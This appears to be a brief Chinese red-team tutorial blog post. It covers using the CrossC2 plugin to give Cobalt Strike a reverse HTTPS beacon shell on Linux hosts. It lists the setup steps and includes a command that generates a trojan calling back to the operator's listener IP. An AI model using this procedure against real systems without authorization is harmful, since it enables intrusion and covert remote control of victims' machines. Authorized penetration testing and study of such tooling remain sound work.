CobaltStrike上線Linux主機(CrossC2)

hu1ge(micr067)發表於2020-07-15

一、簡述

CrossC2外掛是為企業和紅團隊人員提供的安全框架,支援 CobaltStrike 對其他平臺的滲透測試(Linux / MacOS /...),支援自定義模組,幷包括一些常用的滲透模組。

利用CrossC2外掛通過在Linux上執行木馬反彈一個CobaltStrike型別的shell。

CrossC2外掛專案地址:https://github.com/gloxec/CrossC2

受限描述:

  • CobaltStrike:目前僅支援 cs 3.14版本,4.0可上線無法執行其他操作。

  • Linux:對於特別舊的系統,您可以在 can 中選擇"Linux-GLIBC"選項(2010 年左右)

  • MacOS:最新系統僅支援 64 位程式

二、實驗

1.genCrossC2.Linux 檔案上傳到CobaltStrike服務端目錄下。

2.由於 Cross C2目前只支援HTTPS Beacon,所以在Listenrs中選擇HTTPS進行監聽,
服務端開啟監聽 windows/beacon_https/reverse_https 型別的beacon

3.生成木馬

./genCrossC2.Linux 監聽的IP 監聽的埠 null null Linux x64 test

4.執行木馬上線

成功上線

相關文章